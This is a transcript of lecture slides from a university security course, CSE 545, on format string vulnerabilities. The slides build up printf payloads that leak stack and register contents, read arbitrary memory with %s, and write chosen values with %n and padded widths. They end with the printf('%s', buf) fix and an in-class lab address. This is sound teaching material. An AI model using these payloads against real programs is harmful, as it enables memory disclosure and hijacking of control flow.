Format String Vulnerabilities in CSE 545

cse 545 format string vulnerabilities n.w
1 / 32
Embed
Share

Dive into the world of format string vulnerabilities with CSE 545 and explore how printf statements can be exploited to leak sensitive information and control program flow. Learn about the dangers of improper format string usage and how to prevent such vulnerabilities in your code.

  • Security
  • Exploitation
  • Programming
  • Vulnerabilities
rayaanacharya
paur Follow

Uploaded on | 0 Views

Download Presentation

Please find below an Image/Link to download the presentation.

The content on the website is provided AS IS for your information and personal use only. It may not be sold, licensed, or shared on other websites without obtaining consent from the author. If you encounter any issues during the download, it is possible that the publisher has removed the file from their server.

You are allowed to download the files provided on this website for personal or commercial use, subject to the condition that they are used lawfully. All files are the property of their respective owners.

Download Presentation

The content on the website is provided AS IS for your information and personal use only. It may not be sold, licensed, or shared on other websites without obtaining consent from the author.

E N D

Presentation Transcript

  1. CSE 545 Format String Vulnerabilities Tiffany Bao tbao@asu.edu

  2. Format String Vulnerabilities 1

  3. printf(%d %d %d %d %d %d %d %d\n, 1, 2, 3, 4, 5, 6, 7, 8); Output: 1 2 3 4 5 6 7 8 2

  4. printf(%d %d %d %d %d %d %d %d\n, 1, 2, 3, 4, 5, 6, 7, 8); 1. 2. 3. 4. 5. 6. 7. 8. 9. rdi: & %d %d %d %d %d %d %d %d\n rsi: 1 rdx: 2 rcx: 3 r8: 4 r9: 5 on the stack (6) on the stack (7) on the stack (8) 3

  5. printf(%d %d %d %d %d %d %d %d\n, 1, 2, 3, 4, 5, 6, 7, 8); 1. 2. 3. 4. 5. 6. 7. 8. 9. rdi: & %d %d %d %d %d %d %d %d\n rsi: 1 rdx: 2 rcx: 3 r8: 4 r9: 5 on the stack (6) on the stack (7) on the stack (8) 4

  6. printf(%d %d %d %d %d %d %d %d\n, 1, 2, 3, 4, 5, 6, 7, 8); 1. 2. 3. 4. 5. 6. 7. 8. 9. rdi: & %d %d %d %d %d %d %d %d\n rsi: 1 rdx: 2 rcx: 3 r8: 4 r9: 5 on the stack (6) on the stack (7) on the stack (8) It still print the arguments 5

  7. printf(%d %d %d %d %d %d %d %d\n, 1, 2, 3, 4, 5, 6, 7, 8); Control this 1. rdi: & %d %d %d %d %d %d %d %d\n 2. rsi: 1 3. rdx: 2 4. rcx: 3 5. r8: 4 6. r9: 5 7. on the stack (6) 8. on the stack (7) 9. on the stack (8) Leak registers and stack 6

  8. rsp -> %llx %llx char buf[] = %llx %llx %llx %llx %llx %llx %llx %llx\n ; printf(buf); rbp -> %llx %llx %llx %llx %llx %llx %llx %llx\n ; saved rbp saved rip (return address) rbp + 8 -> 7

  9. rsp -> 0x555555554708 %llx %llx char buf[] = %llx %llx %llx %llx %llx %llx %llx %llx\n ; printf(buf); rbp -> %llx %llx %llx %llx %llx %s %llx %llx\n ; saved rbp saved rip (return address) rbp + 8 -> 8

  10. rsp -> 0x555555554708 %llx %llx char buf[] = little_end (0x555555554708) + %llx %llx %llx %llx %llx %llx %llx %llx\n ; printf(buf); rbp -> saved rbp saved rip (return address) rbp + 8 -> %llx %llx %llx %llx %llx %s %llx %llx\n ; 9

  11. rsp -> 0x555555554708 %llx %llx GOT entry, Stack canary, char buf[] = little_end (0x555555554708) + %llx %llx %llx %llx %llx %llx %llx %llx\n ; printf(buf); rbp -> saved rbp saved rip (return address) rbp + 8 -> %llx %llx %llx %llx %llx %s %llx %llx\n ; 10

  12. rsp -> \x08\x47\x55\x55 \x55\x55\x00\x00 %llx %llx GOT entry, Stack canary, char buf[] = little_end (0x555555554708) + %llx %llx %llx %llx %llx %llx %llx %llx\n ; printf(buf); rbp -> saved rbp saved rip (return address) rbp + 8 -> %llx %llx %llx %llx %llx %s %llx %llx\n ; 11

  13. printf(m = %2$d, n = %1$d, n, m); 12

  14. rsp -> %llx%llx %llx%llx %llx%llx %llx%$11 sAAAAAAA \x08\x47\x55\x55 \x55\x55\x00\x00 GOT entry, Stack canary, char buf[] = %llx%llx%llx%llx%llx%llx %llx%$11s\n + little_end (0x555555554708); printf(buf); rbp -> rbp + 8 -> saved rbp saved rip (return address) %llx %llx %llx %llx %llx %s %llx %llx\n ; 13

  15. Arbitrary Read ? Arbitrary Write 14

  16. int n; printf( hello%n\n , &n); printf( n = %d\n , n); Output? 15

  17. int n; printf( hello%n\n , &n); printf( n = %d\n , n); Write the number of printed bytes into variable n. 16

  18. int n; printf( hello%n\n , &n); control this printf( n = %d\n , n); Write the number of printed bytes into variable n. 17

  19. char buf[] = hello%n\n; printf(buf); rsp -> hello%n\n rbp -> saved rbp saved rip (return address) rbp + 8 -> 18

  20. char buf[] = hello%n\n; printf(buf); rsp -> hello%n\n write 5 to *rsi rbp -> saved rbp saved rip (return address) rbp + 8 -> 19

  21. char buf[] = hello%n%n%n%n%n%n \n ; printf(buf); rsp -> hello%n\n write 5 to *rsi, *rdx, *rcx, *r8, *r9 values on stack rbp -> saved rbp saved rip (return address) rbp + 8 -> 20

  22. char buf[] = little_end(0x555555554708) + hello%n%n%n%n%n%n \n ; printf(buf); rsp -> 0x555555554708 hello%n\n write 5 to *rsi, *rdx, *rcx, *r8, *r9 values on stack rbp -> saved rbp saved rip (return address) rbp + 8 -> 21

  23. char buf[] = little_end(0x555555554708) + hello%x%x%x%x%x%n \n ; printf(buf); print rsi, rdx, rcx, r8, r9 values on stack 22

  24. Goal: [0x555555554708] = 1000 char buf[] = little_end(0x555555554708) + hello%x%x%x%x%x%n\n ; printf(buf); #printed bytes before writing to 0x555555554708 : 8 + 5 + len(rsi) + len(rdx) + len(rcx) + len(r8) + len(r9) How to make the number equal to 1000? 23

  25. %[position$][flag][min width][.precision][length modifier][conversion specifier] long x = 10; printf( %010ld , x); Print x as a long int with the minimum length of 10 bytes, padding with 0. Output: 0000000010 24

  26. Goal: [0x555555554708] = 1000 char buf[] = little_end(0x555555554708) + %0200x%0200x%0200x%0200x%0200x%n\n ; printf(buf); #printed bytes before writing to 0x555555554708 : 8 + 5 + len(rsi) + len(rdx) + len(rcx) + len(r8) + len(r9) 25

  27. Goal: [0x555555554708] = 1000 char buf[] = little_end(0x555555554708) + %0200x%0200x%0200x%0200x%0200x%n\n ; printf(buf); little_end(0x555555554708) = \x08\x47\x55\x55\x55\x55\x00\x00 will break the format string 26

  28. rsp -> Goal: [0x555555554708] = 1000 char buf[] = %0200x%0200x%0200x%0200x%0200x%n\n + little_end(0x555555554708); %0200x%0200x%0200 x%0200x%0200x%n\n \x08\x47\x55\x55\ x55\x55\x00\x00 rbp -> saved rbp saved rip (return address) rbp + 8 -> printf(buf); 27

  29. rsp -> Goal: [0x555555554708] = 1000 char buf[] = %0200x%0200x%0200x%0200x%0200x%11$n\n + padd + little_end(0x555555554708); %0200x%0 200x%020 0x%0200x %0200x%1 1$n\npadd \x08\x47\x55\x55\ x55\x55\x00\x00 rbp -> rbp + 8 -> printf(buf); saved rbp saved rip (return address) 28

  30. Make sure that the user cannot provide format string printf(buf); -> printf( %s , buf); 29

  31. in-class Lab 30

  32. Service IP: 107.21.135.41 Port: 7777 Service file: https://cse545.tiffanybao.com/labs/week7/format_string.c https://cse545.tiffanybao.com/labs/week7/format_string

Related


textbook$ What Your Heart Needs for the Hard Days 52 Encouraging Truths to Hold On To [R.A.R]

textbook$ What Your Heart Needs for the Hard Days 52 Encouraging Truths to Hold On To [R.A.R]

amberfamousd
MHRM Online Lecture on Marketing & HR Management - Sem 5 & 6 Syllabus and Question Paper Format

MHRM Online Lecture on Marketing & HR Management - Sem 5 & 6 Syllabus and Question Paper Format

erasmus
Standards and Formats in Bibliographic Information Exchange

Standards and Formats in Bibliographic Information Exchange

despina
MURTI Faculty Fellow Application Format and Research Proposal

MURTI Faculty Fellow Application Format and Research Proposal

cordelia
MRCGP Applied Knowledge Test

MRCGP Applied Knowledge Test

lili
Current Operations and Projects Update at IETF 93 Prague

Current Operations and Projects Update at IETF 93 Prague

rumi
Updates on Biosketch Format Changes by NIH - June 2021

Updates on Biosketch Format Changes by NIH - June 2021

arnie
Effective Strategies for Classified Advertisements - Tips and Examples

Effective Strategies for Classified Advertisements - Tips and Examples

iona
NDIS PROVIDERS LETTER FORMAT

NDIS PROVIDERS LETTER FORMAT

Brayden1
Writing an Open Letter: A Powerful Form of Expression

Writing an Open Letter: A Powerful Form of Expression

oriana
Shop Large Format Porcelain Tiles Online - Elegant & Spacious Designs

Shop Large Format Porcelain Tiles Online - Elegant & Spacious Designs

Hazel1
Revised AP World History DBQ Exam Format and Design Shifts

Revised AP World History DBQ Exam Format and Design Shifts

alfie
Comprehensive Guide to NBDHE Format and Test-Taking Hints

Comprehensive Guide to NBDHE Format and Test-Taking Hints

jadiel
Proposed 80 MHz EHT LPI PPDU Format for IEEE 802.11-20/1347r1

Proposed 80 MHz EHT LPI PPDU Format for IEEE 802.11-20/1347r1

hershel
Mastering MLA Style: A Comprehensive Guide

Mastering MLA Style: A Comprehensive Guide

blaze
Engineering Program Self-Assessment Report Format Overview

Engineering Program Self-Assessment Report Format Overview

rose
IEEE 802.11-20/0087r0 Discussions on U-SIG Content and EHT-SIG Format

IEEE 802.11-20/0087r0 Discussions on U-SIG Content and EHT-SIG Format

araminta
McGovern Medical School CV Format and Guidelines

McGovern Medical School CV Format and Guidelines

tori
Cloud-Optimized HDF5 Files Overview

Cloud-Optimized HDF5 Files Overview

gianni
IEEE 802.11-20/1192r0 TB PPDU Format Signaling in Trigger Frame

IEEE 802.11-20/1192r0 TB PPDU Format Signaling in Trigger Frame

darcy
Update on MA Center for Health Information & Analysis Case Mix User Workgroup - September 27, 2016

Update on MA Center for Health Information & Analysis Case Mix User Workgroup - September 27, 2016

khristi
Sample Slide Format for COI Disclosure at Academic Meetings

Sample Slide Format for COI Disclosure at Academic Meetings

martyngo

More Related Content